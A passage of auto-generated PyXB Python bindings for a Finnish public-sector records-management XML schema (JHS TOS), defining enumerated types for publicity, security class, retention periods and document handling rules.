julkisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='3', tag=None)
julkisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='4', tag=None)
julkisuusluokkaKoodiTyyppi._InitializeFacetMap(julkisuusluokkaKoodiTyyppi._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'julkisuusluokkaKoodiTyyppi', julkisuusluokkaKoodiTyyppi)
_module_typeBindings.julkisuusluokkaKoodiTyyppi = julkisuusluokkaKoodiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}salassapitoAikaArvoTyyppi
class salassapitoAikaArvoTyyppi (pyxb.binding.datatypes.integer):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'salassapitoAikaArvoTyyppi')
_XSDLocation = None
_Documentation = None
salassapitoAikaArvoTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'salassapitoAikaArvoTyyppi', salassapitoAikaArvoTyyppi)
_module_typeBindings.salassapitoAikaArvoTyyppi = salassapitoAikaArvoTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}salassapitoPerusteTekstiTyyppi
class salassapitoPerusteTekstiTyyppi (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'salassapitoPerusteTekstiTyyppi')
_XSDLocation = None
_Documentation = None
salassapitoPerusteTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'salassapitoPerusteTekstiTyyppi', salassapitoPerusteTekstiTyyppi)
_module_typeBindings.salassapitoPerusteTekstiTyyppi = salassapitoPerusteTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}salassapidonLaskentaperusteTekstiTyyppi
class salassapidonLaskentaperusteTekstiTyyppi (pyxb.binding.datatypes.string):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'salassapidonLaskentaperusteTekstiTyyppi')
_XSDLocation = None
_Documentation = None
salassapidonLaskentaperusteTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'salassapidonLaskentaperusteTekstiTyyppi', salassapidonLaskentaperusteTekstiTyyppi)
_module_typeBindings.salassapidonLaskentaperusteTekstiTyyppi = salassapidonLaskentaperusteTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}suojaustasoKoodiTyyppi
class suojaustasoKoodiTyyppi (pyxb.binding.datatypes.integer, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'suojaustasoKoodiTyyppi')
_XSDLocation = None
_Documentation = None
suojaustasoKoodiTyyppi._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=suojaustasoKoodiTyyppi, enum_prefix=None)
suojaustasoKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='1', tag=None)
suojaustasoKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='2', tag=None)
suojaustasoKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='3', tag=None)
suojaustasoKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='4', tag=None)
suojaustasoKoodiTyyppi._InitializeFacetMap(suojaustasoKoodiTyyppi._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'suojaustasoKoodiTyyppi', suojaustasoKoodiTyyppi)
_module_typeBindings.suojaustasoKoodiTyyppi = suojaustasoKoodiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}turvallisuusluokkaKoodiTyyppi
class turvallisuusluokkaKoodiTyyppi (pyxb.binding.datatypes.integer, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'turvallisuusluokkaKoodiTyyppi')
_XSDLocation = None
_Documentation = None
turvallisuusluokkaKoodiTyyppi._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=turvallisuusluokkaKoodiTyyppi, enum_prefix=None)
turvallisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='1', tag=None)
turvallisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='2', tag=None)
turvallisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='3', tag=None)
turvallisuusluokkaKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='4', tag=None)
turvallisuusluokkaKoodiTyyppi._InitializeFacetMap(turvallisuusluokkaKoodiTyyppi._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'turvallisuusluokkaKoodiTyyppi', turvallisuusluokkaKoodiTyyppi)
_module_typeBindings.turvallisuusluokkaKoodiTyyppi = turvallisuusluokkaKoodiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}henkilotietoluonneKoodiTyyppi
class henkilotietoluonneKoodiTyyppi (pyxb.binding.datatypes.integer, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'henkilotietoluonneKoodiTyyppi')
_XSDLocation = None
_Documentation = None
henkilotietoluonneKoodiTyyppi._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=henkilotietoluonneKoodiTyyppi, enum_prefix=None)
henkilotietoluonneKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='1', tag=None)
henkilotietoluonneKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='2', tag=None)
henkilotietoluonneKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='3', tag=None)
henkilotietoluonneKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='4', tag=None)
henkilotietoluonneKoodiTyyppi._CF_enumeration.addEnumeration(unicode_value='5', tag=None)
henkilotietoluonneKoodiTyyppi._InitializeFacetMap(henkilotietoluonneKoodiTyyppi._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'henkilotietoluonneKoodiTyyppi', henkilotietoluonneKoodiTyyppi)
_module_typeBindings.henkilotietoluonneKoodiTyyppi = henkilotietoluonneKoodiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}sailytysajanPituusArvoTyyppi
class sailytysajanPituusArvoTyyppi (pyxb.binding.datatypes.integer):
"""Suositeltavat arvot: 0, 3, 6, 10, 20, 50, 120 tai -1 (pysyvä säilytys)"""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'sailytysajanPituusArvoTyyppi')
_XSDLocation = None
_Documentation = 'Suositeltavat arvot: 0, 3, 6, 10, 20, 50, 120 tai -1 (pysyvä säilytys)'
sailytysajanPituusArvoTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'sailytysajanPituusArvoTyyppi', sailytysajanPituusArvoTyyppi)
_module_typeBindings.sailytysajanPituusArvoTyyppi = sailytysajanPituusArvoTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}sailytysajanPerusteTekstiTyyppi
class sailytysajanPerusteTekstiTyyppi (pyxb.binding.datatypes.string):
"""Säilytysaika voi perustua lakiin tai olla organisaation oma päätös. Pysyvä säilytys perustuu arkistolaitoksen päätökseen."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'sailytysajanPerusteTekstiTyyppi')
_XSDLocation = None
_Documentation = 'Säilytysaika voi perustua lakiin tai olla organisaation oma päätös. Pysyvä säilytys perustuu arkistolaitoksen päätökseen.'
sailytysajanPerusteTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'sailytysajanPerusteTekstiTyyppi', sailytysajanPerusteTekstiTyyppi)
_module_typeBindings.sailytysajanPerusteTekstiTyyppi = sailytysajanPerusteTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}sailytysajanLaskentaperusteTekstiTyyppi
class sailytysajanLaskentaperusteTekstiTyyppi (pyxb.binding.datatypes.string):
"""Suositeltavat arvot käsittelyprosessille: Asian lopullinen ratkaisu. Suositeltavat arvot asiakirjalle: Asian lopullinen ratkaisu, Asiakirjan päivämäärä."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'sailytysajanLaskentaperusteTekstiTyyppi')
_XSDLocation = None
_Documentation = 'Suositeltavat arvot käsittelyprosessille: Asian lopullinen ratkaisu. Suositeltavat arvot asiakirjalle: Asian lopullinen ratkaisu, Asiakirjan päivämäärä.'
sailytysajanLaskentaperusteTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'sailytysajanLaskentaperusteTekstiTyyppi', sailytysajanLaskentaperusteTekstiTyyppi)
_module_typeBindings.sailytysajanLaskentaperusteTekstiTyyppi = sailytysajanLaskentaperusteTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}toimenpideluokkaTekstiTyyppi
class toimenpideluokkaTekstiTyyppi (pyxb.binding.datatypes.string):
"""
Suositeltavat arvot: ohjaus, vireilletulo , valmistelu, päätöksenteko, toimeenpano, tiedoksianto, muutoksenhaku, seuranta.
"""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'toimenpideluokkaTekstiTyyppi')
_XSDLocation = None
_Documentation = '\n\tSuositeltavat arvot: ohjaus, vireilletulo , valmistelu, päätöksenteko, toimeenpano, tiedoksianto, muutoksenhaku, seuranta.\n\t '
toimenpideluokkaTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'toimenpideluokkaTekstiTyyppi', toimenpideluokkaTekstiTyyppi)
_module_typeBindings.toimenpideluokkaTekstiTyyppi = toimenpideluokkaTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}toimenpideluokkaTarkenneTekstiTyyppi
class toimenpideluokkaTarkenneTekstiTyyppi (pyxb.binding.datatypes.string):
"""
Suositeltavat arvot: ohjaus, vireilletulo , valmistelu, päätöksenteko, toimeenpano, tiedoksianto, muutoksenhaku, seuranta.
"""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'toimenpideluokkaTarkenneTekstiTyyppi')
_XSDLocation = None
_Documentation = '\n\tSuositeltavat arvot: ohjaus, vireilletulo , valmistelu, päätöksenteko, toimeenpano, tiedoksianto, muutoksenhaku, seuranta.\n\t '
toimenpideluokkaTarkenneTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'toimenpideluokkaTarkenneTekstiTyyppi', toimenpideluokkaTarkenneTekstiTyyppi)
_module_typeBindings.toimenpideluokkaTarkenneTekstiTyyppi = toimenpideluokkaTarkenneTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}asiakirjaLuokkaTekstiTyyppi
class asiakirjaLuokkaTekstiTyyppi (pyxb.binding.datatypes.string):
"""
Suositeltavia arvoja ovat: Aloite, Asetus, Ehdotus, Esitys, Esityslista, Hakemus, Ilmoitus, Julkaisu, Kannanotto, Kantelu, Kartta, Kertomus, Kirje, Kutsu, Kuulutus, Kuva, Laki, Lasku, Lausunto, Lausuntopyyntö, Liite, Luettelo, Lupa, Mietintö, Muistio, Määräys, Nimittämiskirja, Ohje, Ohjelma, Oikaisuvaatimus, Ote, Piirustus, Pyyntö, Päätös, Pöytäkirja, Raportti, Seloste, Selvitys, Sopimus, Strategia, Suositus, Suunnitelma, Talousarvio, Tarjous, Tarjouspyyntö, Teos, Tiedote, Tilasto, Tilaus, Tilinpäätös, Todistus, Tosite, Valitus, Valtakirja, Vastine, Yhteenveto.
Asiakirjatyypit ilmaistaan aina yksikkömuodossa.
"""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'asiakirjaLuokkaTekstiTyyppi')
_XSDLocation = None
_Documentation = '\n\tSuositeltavia arvoja ovat: Aloite, Asetus, Ehdotus, Esitys, Esityslista, Hakemus, Ilmoitus, Julkaisu, Kannanotto, Kantelu, Kartta, Kertomus, Kirje, Kutsu, Kuulutus, Kuva, Laki, Lasku, Lausunto, Lausuntopyyntö, Liite, Luettelo, Lupa, Mietintö, Muistio, Määräys, Nimittämiskirja, Ohje, Ohjelma, Oikaisuvaatimus, Ote, Piirustus, Pyyntö, Päätös, Pöytäkirja, Raportti, Seloste, Selvitys, Sopimus, Strategia, Suositus, Suunnitelma, Talousarvio, Tarjous, Tarjouspyyntö, Teos, Tiedote, Tilasto, Tilaus, Tilinpäätös, Todistus, Tosite, Valitus, Valtakirja, Vastine, Yhteenveto.\n\tAsiakirjatyypit ilmaistaan aina yksikkömuodossa.\n\t '
asiakirjaLuokkaTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'asiakirjaLuokkaTekstiTyyppi', asiakirjaLuokkaTekstiTyyppi)
_module_typeBindings.asiakirjaLuokkaTekstiTyyppi = asiakirjaLuokkaTekstiTyyppi
# Atomic simple type: {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kasittelyprosessinTilaTekstiTyyppi
class kasittelyprosessinTilaTekstiTyyppi (pyxb.binding.datatypes.string):
"""
Suositeltavia arvoja ovat: Avattu, Vireillä, Valmistelussa, Ratkaistavana, Toimitettu tiedoksi, Toimeenpantava, Päätetty, Avattu uudelleen, Muutoksenhaku, Seurannassa, Siirretty, Hävitetty.
"""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kasittelyprosessinTilaTekstiTyyppi')
_XSDLocation = None
_Documentation = '\n\tSuositeltavia arvoja ovat: Avattu, Vireillä, Valmistelussa, Ratkaistavana, Toimitettu tiedoksi, Toimeenpantava, Päätetty, Avattu uudelleen, Muutoksenhaku, Seurannassa, Siirretty, Hävitetty.\n\t\t\t'
kasittelyprosessinTilaTekstiTyyppi._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'kasittelyprosessinTilaTekstiTyyppi', kasittelyprosessinTilaTekstiTyyppi)
_module_typeBindings.kasittelyprosessinTilaTekstiTyyppi = kasittelyprosessinTilaTekstiTyyppi
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TosTiedot uses Python identifier TosTiedot
__TosTiedot = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TosTiedot'), 'TosTiedot', '__httpskeemat_jhs_suositukset_fitos20150115_CTD_ANON_httpskeemat_jhs_suositukset_fitos20150115TosTiedot', False, None, )
TosTiedot = property(__TosTiedot.value, __TosTiedot.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Luokka uses Python identifier Luokka
__Luokka = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Luokka'), 'Luokka', '__httpskeemat_jhs_suositukset_fitos20150115_CTD_ANON_httpskeemat_jhs_suositukset_fitos20150115Luokka', True, None, )
Luokka = property(__Luokka.value, __Luokka.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
__Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_CTD_ANON_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
_ElementMap.update({
__TosTiedot.name() : __TosTiedot,
__Luokka.name() : __Luokka,
__Laajennos.name() : __Laajennos
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON = CTD_ANON
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_ (pyxb.binding.basis.complexTypeDefinition):
"""Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit."""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
_HasWildcardElement = True
_ElementMap.update({
})
_AttributeMap.update({
})
_module_typeBindings.CTD_ANON_ = CTD_ANON_
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}nimekeTyyppi with content type ELEMENT_ONLY
class nimekeTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}nimekeTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'nimekeTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}NimekeTeksti uses Python identifier NimekeTeksti
__NimekeTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti'), 'NimekeTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_nimekeTyyppi_httpskeemat_jhs_suositukset_fitos20150115NimekeTeksti', False, None, )
NimekeTeksti = property(__NimekeTeksti.value, __NimekeTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}NimekeKielella uses Python identifier NimekeKielella
__NimekeKielella = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'NimekeKielella'), 'NimekeKielella', '__httpskeemat_jhs_suositukset_fitos20150115_nimekeTyyppi_httpskeemat_jhs_suositukset_fitos20150115NimekeKielella', True, None, )
NimekeKielella = property(__NimekeKielella.value, __NimekeKielella.set, None, None)
_ElementMap.update({
__NimekeTeksti.name() : __NimekeTeksti,
__NimekeKielella.name() : __NimekeKielella
})
_AttributeMap.update({
})
_module_typeBindings.nimekeTyyppi = nimekeTyyppi
Namespace.addCategoryObject('typeBinding', 'nimekeTyyppi', nimekeTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}asiasanatTyyppi with content type ELEMENT_ONLY
class asiasanatTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}asiasanatTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'asiasanatTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}AsiasanastoTeksti uses Python identifier AsiasanastoTeksti
__AsiasanastoTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'AsiasanastoTeksti'), 'AsiasanastoTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_asiasanatTyyppi_httpskeemat_jhs_suositukset_fitos20150115AsiasanastoTeksti', True, None, )
AsiasanastoTeksti = property(__AsiasanastoTeksti.value, __AsiasanastoTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}AsiasanaTeksti uses Python identifier AsiasanaTeksti
__AsiasanaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'AsiasanaTeksti'), 'AsiasanaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_asiasanatTyyppi_httpskeemat_jhs_suositukset_fitos20150115AsiasanaTeksti', True, None, )
AsiasanaTeksti = property(__AsiasanaTeksti.value, __AsiasanaTeksti.set, None, None)
_ElementMap.update({
__AsiasanastoTeksti.name() : __AsiasanastoTeksti,
__AsiasanaTeksti.name() : __AsiasanaTeksti
})
_AttributeMap.update({
})
_module_typeBindings.asiasanatTyyppi = asiasanatTyyppi
Namespace.addCategoryObject('typeBinding', 'asiasanatTyyppi', asiasanatTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kasittelysaannotTyyppi with content type ELEMENT_ONLY
class kasittelysaannotTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kasittelysaannotTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kasittelysaannotTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}JulkisuusluokkaMuutosTeksti uses Python identifier JulkisuusluokkaMuutosTeksti
__JulkisuusluokkaMuutosTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaMuutosTeksti'), 'JulkisuusluokkaMuutosTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelysaannotTyyppi_httpskeemat_jhs_suositukset_fitos20150115JulkisuusluokkaMuutosTeksti', False, None, )
JulkisuusluokkaMuutosTeksti = property(__JulkisuusluokkaMuutosTeksti.value, __JulkisuusluokkaMuutosTeksti.set, None, 'Esimerkiksi: Asian päättäminen, Päätöksenteko (toimenpide), Päätöksen allekirjoitus (toimenpide).')
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}AiempienVersioidenPoistoTeksti uses Python identifier AiempienVersioidenPoistoTeksti
__AiempienVersioidenPoistoTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'AiempienVersioidenPoistoTeksti'), 'AiempienVersioidenPoistoTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelysaannotTyyppi_httpskeemat_jhs_suositukset_fitos20150115AiempienVersioidenPoistoTeksti', False, None, )
AiempienVersioidenPoistoTeksti = property(__AiempienVersioidenPoistoTeksti.value, __AiempienVersioidenPoistoTeksti.set, None, 'Suositeltavat: Asian ratkaisu, Tietty aika asian ratkaisusta, Asiakirjan hävittäminen.')
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TallennuspaikkaTeksti uses Python identifier TallennuspaikkaTeksti
__TallennuspaikkaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TallennuspaikkaTeksti'), 'TallennuspaikkaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelysaannotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TallennuspaikkaTeksti', False, None, )
TallennuspaikkaTeksti = property(__TallennuspaikkaTeksti.value, __TallennuspaikkaTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SailytyspaikkaTeksti uses Python identifier SailytyspaikkaTeksti
__SailytyspaikkaTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SailytyspaikkaTeksti'), 'SailytyspaikkaTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelysaannotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SailytyspaikkaTeksti', False, None, )
SailytyspaikkaTeksti = property(__SailytyspaikkaTeksti.value, __SailytyspaikkaTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}Laajennos uses Python identifier Laajennos
__Laajennos = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), 'Laajennos', '__httpskeemat_jhs_suositukset_fitos20150115_kasittelysaannotTyyppi_httpskeemat_jhs_suositukset_fitos20150115Laajennos', True, None, )
Laajennos = property(__Laajennos.value, __Laajennos.set, None, 'Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.')
_ElementMap.update({
__JulkisuusluokkaMuutosTeksti.name() : __JulkisuusluokkaMuutosTeksti,
__AiempienVersioidenPoistoTeksti.name() : __AiempienVersioidenPoistoTeksti,
__TallennuspaikkaTeksti.name() : __TallennuspaikkaTeksti,
__SailytyspaikkaTeksti.name() : __SailytyspaikkaTeksti,
__Laajennos.name() : __Laajennos
})
_AttributeMap.update({
})
_module_typeBindings.kasittelysaannotTyyppi = kasittelysaannotTyyppi
Namespace.addCategoryObject('typeBinding', 'kasittelysaannotTyyppi', kasittelysaannotTyyppi)
# Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kayttorajoitusTiedotTyyppi with content type ELEMENT_ONLY
class kayttorajoitusTiedotTyyppi (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}kayttorajoitusTiedotTyyppi with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'kayttorajoitusTiedotTyyppi')
_XSDLocation = None
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}JulkisuusluokkaKoodi uses Python identifier JulkisuusluokkaKoodi
__JulkisuusluokkaKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'JulkisuusluokkaKoodi'), 'JulkisuusluokkaKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115JulkisuusluokkaKoodi', False, None, )
JulkisuusluokkaKoodi = property(__JulkisuusluokkaKoodi.value, __JulkisuusluokkaKoodi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SalassapitoAikaArvo uses Python identifier SalassapitoAikaArvo
__SalassapitoAikaArvo = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoAikaArvo'), 'SalassapitoAikaArvo', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SalassapitoAikaArvo', False, None, )
SalassapitoAikaArvo = property(__SalassapitoAikaArvo.value, __SalassapitoAikaArvo.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SalassapitoPerusteTeksti uses Python identifier SalassapitoPerusteTeksti
__SalassapitoPerusteTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SalassapitoPerusteTeksti'), 'SalassapitoPerusteTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SalassapitoPerusteTeksti', False, None, )
SalassapitoPerusteTeksti = property(__SalassapitoPerusteTeksti.value, __SalassapitoPerusteTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SalassapidonLaskentaperusteTeksti uses Python identifier SalassapidonLaskentaperusteTeksti
__SalassapidonLaskentaperusteTeksti = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SalassapidonLaskentaperusteTeksti'), 'SalassapidonLaskentaperusteTeksti', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SalassapidonLaskentaperusteTeksti', False, None, )
SalassapidonLaskentaperusteTeksti = property(__SalassapidonLaskentaperusteTeksti.value, __SalassapidonLaskentaperusteTeksti.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}SuojaustasoKoodi uses Python identifier SuojaustasoKoodi
__SuojaustasoKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'SuojaustasoKoodi'), 'SuojaustasoKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115SuojaustasoKoodi', False, None, )
SuojaustasoKoodi = property(__SuojaustasoKoodi.value, __SuojaustasoKoodi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}TurvallisuusluokkaKoodi uses Python identifier TurvallisuusluokkaKoodi
__TurvallisuusluokkaKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'TurvallisuusluokkaKoodi'), 'TurvallisuusluokkaKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115TurvallisuusluokkaKoodi', False, None, )
TurvallisuusluokkaKoodi = property(__TurvallisuusluokkaKoodi.value, __TurvallisuusluokkaKoodi.set, None, None)
# Element {http://skeemat.jhs-suositukset.fi/tos/2015/01/15}HenkilotietoluonneKoodi uses Python identifier HenkilotietoluonneKoodi
__HenkilotietoluonneKoodi = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'HenkilotietoluonneKoodi'), 'HenkilotietoluonneKoodi', '__httpskeemat_jhs_suositukset_fitos20150115_kayttorajoitusTiedotTyyppi_httpskeemat_jhs_suositukset_fitos20150115HenkilotietoluonneKoodi', False, None, )
